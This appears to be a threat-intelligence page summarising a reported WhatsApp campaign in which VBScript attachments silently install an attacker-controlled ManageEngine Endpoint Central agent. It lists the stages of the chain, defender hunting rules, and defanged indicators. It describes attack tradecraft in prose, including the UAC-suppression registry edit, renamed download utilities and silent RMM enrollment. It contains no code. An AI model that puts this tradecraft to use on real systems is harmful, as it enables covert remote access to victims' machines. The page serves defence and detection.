WhatsApp VBScript ManageEngine RMM campaign

Summary

Kaspersky reported a June 2026 campaign that used compromised WhatsApp accounts to send malicious .vbs / .vbe attachments directly to contacts. The attachments masqueraded as invoices, debt notices, account statements, payment records, bank statements, and localized business documents; execution launched Windows Script Host and a multi-stage VBScript chain that installed a preconfigured ManageEngine Endpoint Central agent for remote access.

Kaspersky observed victims in Malaysia, Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, and Vietnam, with about 80% of observed victims in Malaysia. The campaign appeared broad and opportunistic rather than focused on a specific organization or sector. Kaspersky assessed low-confidence Chinese-speaking operator indicators based on simplified-Chinese script comments and infrastructure overlap with previously observed ValleyRAT / Gh0st RAT activity, but did not attribute the campaign to a known group.

Tags

• ops
• operations
• WhatsApp
• VBScript
• VBS
• VBE
• Windows Script Host
• ManageEngine Endpoint Central
• RMM abuse
• social engineering
• compromised accounts
• Windows malware
• remote access
• Chinese-speaking operator
• low-confidence attribution

Why this matters

• The lure comes from a known WhatsApp contact, so user trust is borrowed from a compromised personal account rather than from a spoofed sender domain.
• The payload abuses a legitimate endpoint-management platform. Successful response has to distinguish authorized ManageEngine Endpoint Central agents from attacker-enrolled agents.
• The chain still depends on user execution, but it layers financial-document naming, localized filenames, Windows Update-themed comments, hidden staging directories, renamed Windows download utilities, and UAC-prompt loops to increase success.
• Consumer messaging apps on business endpoints create a blind spot: WhatsApp Desktop can spawn WScript.exe directly from its attachment storage path.

Reported chain

1. A compromised WhatsApp account sends an attachment such as Financial Reports.vbs, Debt confirmation.vbs, Account Statement.vbs, Penyata bank.vbs, or another localized finance-themed filename to contacts.
2. On WhatsApp Desktop, opening the attachment spawns WScript.exe from WhatsApp.Root.exe and executes the script from the WhatsApp Desktop attachment cache. On WhatsApp Web, execution starts from the browser download path or Windows Explorer.
3. Stage 1 creates a working directory under C:\Users\Public\Documents\, commonly using randomized names such as Temp_<random> or MSUpdate_<random>, and may mark files or directories hidden/system.
4. Stage 1 downloads two additional VBScript payloads from attacker-controlled infrastructure. Variants use obfuscation, encoded VBScript, randomized variables, junk content, string reconstruction, and renamed curl.exe / bitsadmin.exe copies with DLL-like names.
5. One Stage 2 script repeatedly attempts to set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0 through an elevated runas flow, trying to reduce administrative consent prompts if the victim grants elevation.
6. The other Stage 2 script creates another hidden working directory, downloads a ZIP archive through mechanisms such as curl, bitsadmin, certutil, PowerShell, or direct HTTP requests, extracts it with Shell.Application, may strip Zone.Identifier, and launches setup1.vbs.
7. The ZIP contains a preconfigured ManageEngine Endpoint Central deployment bundle, including DCAgentServerInfo.json, certificates, UEMSAgent.msi, UEMSAgent.mst, and a malicious setup1.vbs launcher.
8. setup1.vbs verifies the bundle, relaunches with administrative privileges, and silently installs the Endpoint Central agent through msiexec.exe using the attacker-supplied configuration.

Defender heuristics

• Hunt for WScript.exe or cscript.exe child processes of WhatsApp.Root.exe, browsers, or explorer.exe opening .vbs / .vbe files from WhatsApp transfer paths, Downloads, or temporary directories.
• Review C:\Users\Public\Documents\ for hidden/system directories named like Temp_*, MSUpdate_*, Sys*, Data*, random numeric values, and recently staged scripts or ZIP contents.
• Alert on script-driven use of curl, bitsadmin, certutil, PowerShell download cradles, or Shell.Application ZIP extraction followed by wscript.exe or msiexec.exe from user-writable paths.
• Monitor attempted writes to ConsentPromptBehaviorAdmin, especially when generated by wscript.exe, cscript.exe, or unusual parent processes.
• Inventory ManageEngine Endpoint Central agents and validate each installed agent against your organization's legitimate management servers, certificate chain, deployment package, and enrollment time.
• Treat unexpected Endpoint Central enrollment as a remote-access incident: isolate the host, preserve scripts/ZIPs/configuration files, review remote-control and command logs, and rotate credentials exposed on the endpoint.
• Restrict script execution from messaging-app download/cache directories where feasible with AppLocker, WDAC, EDR policy, or attack-surface-reduction controls.
• Educate users that file extensions such as .vbs, .vbe, .js, .ps1, .bat, .cmd, and .exe from messaging apps should be independently verified even when sent by a known contact.

Public indicators

Kaspersky published full hashes and infrastructure in its report. High-level pivots include:

• Finance-themed and localized VBScript filenames, including Financial Reports.vbs, Debt confirmation.vbs, Statement of Debt(30K).vbs, Outstanding Payment List.vbs, Account Statement.vbs, Penyata bank.vbs, and Sila semak bil anda.vbs.
• Download / staging domains and buckets such as temu.baskwms[.]top, invoice.msopsa[.]top, qse.shoppes[.]help, shaaslong[.]one, baoxis[.]cc, Aliyun OSS buckets, Amazon S3 buckets, and Backblaze B2 buckets listed in the Kaspersky IOC section.
• Attacker-controlled Endpoint Central / UEMS management IPs reported by Kaspersky: 202.61.160[.]208, 202.61.160[.]202, 202.61.160[.]201, 202.61.160[.]160, 202.61.160[.]137, and 38.55.151[.]63.

Attribution notes

• Kaspersky did not name a known actor for the activity.
• Simplified-Chinese comments in multiple VBScript samples led Kaspersky to a low-confidence Chinese-speaking-operator assessment.
• Infrastructure overlap with ValleyRAT and Gh0st RAT activity is a useful pivot, but Kaspersky explicitly treated it as insufficient for direct attribution.

Related pages

• Kali365 device-code phishing expansion
• UNC6692 SNOW malware social-engineering campaign
• Microsoft Teams external-chat phishing
• AI-brand impersonation phishing and malvertising

Sources

• Kaspersky Securelist: https://securelist.com/whatsapp-vbs-rmm-campaign/120290/